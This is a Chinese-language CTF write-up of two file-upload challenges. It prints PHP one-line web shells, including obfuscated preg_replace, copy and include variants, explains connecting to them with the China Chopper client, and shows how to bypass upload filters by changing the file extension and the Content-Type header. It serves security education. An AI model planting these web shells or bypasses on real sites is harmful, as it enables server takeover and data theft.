WEB 练习2——文件上传基础练习

今天Evan为大家带来的是两道基础的文件上传题目，通过这两道题目大家可以学习到文件上传以及连接菜刀的基本操作。

• Upload（百度杯九月场）

题目描述：想怎么传就怎么传，就是这么任性。hint：flag在flag.php中  

打开题目链接以后我们会发现这是一道文件上传的题目，并且题目说你可以随意上传文件，那我们上传一句话木马试一试。

构造一个简单的一句话木马：

<?php @eval($_POST[value]);?>

上传文件，上传成功后我们打开上传的的文件看一下，会发现我们的一句话木马变成了这个样子：

@eval($_POST[value]);?>

说明过滤了<?以及PHP关键字，我们百度找一个厉害一点木马：

<script language="php">@eval_r($_POST[sb])</script>

再次上传并连接菜刀便可以找到flag.php文件

这道题目是一道基础的文件上传，需要我们学会一句话木马以及菜刀的使用方式，在这里Evan为大家列举几个常见的比较特殊的一句话木马，在大家今后的学习中会经常用到。  

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
$hh("/[discuz]/e",$_POST['h'],"Access");//菜刀一句话

$filename=$_GET['xbid'];  
include ($filename);//危险的include函数，直接编译任何文件为php格式运行

$reg="c"."o"."p"."y";  
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
$gzid("/[discuz]/e",$_POST['h'],"Access");//菜刀一句话

include ($uid);//危险的include函数，直接编译任何文件为php格式运行

POST  //gif插一句话

• Do you know upload？(第三届“百越杯”福建省高校网络空间安全大赛)

题目描述：加油吧，少年。

和上一道题目类似，只不过这道题目要求我们上传一张图片，我们有两种处理方式，在这里我为大家一一演示。

方法一：上传jpg

我们将写好的一句话木马制作成jpg格式，并且上传抓包

在这里我们将其更改成.php文件重新上传

图片上传成功，我们可以看到图片存在upload/aaa333.php下方，菜刀连接。

在config配置文件中我们看到了数据库的用户名和密码，连接数据库，

在数据库中我们拿到了flag。

方法二：上传.php文件

我们在这里也可以上传.php文件，但是网页会显示如下图所示的文件类型不允许，

于是我们对其进行抓包，

更改Content-Type: application/octet-stream为Content-Type: image/jpeg，POST，接下来做法和上边的相同，小伙伴们可以自己动手试一下。

今天的讲解就到这里，在今后的文章中我会带领大家更深入的学习文件上传类题目，明天见~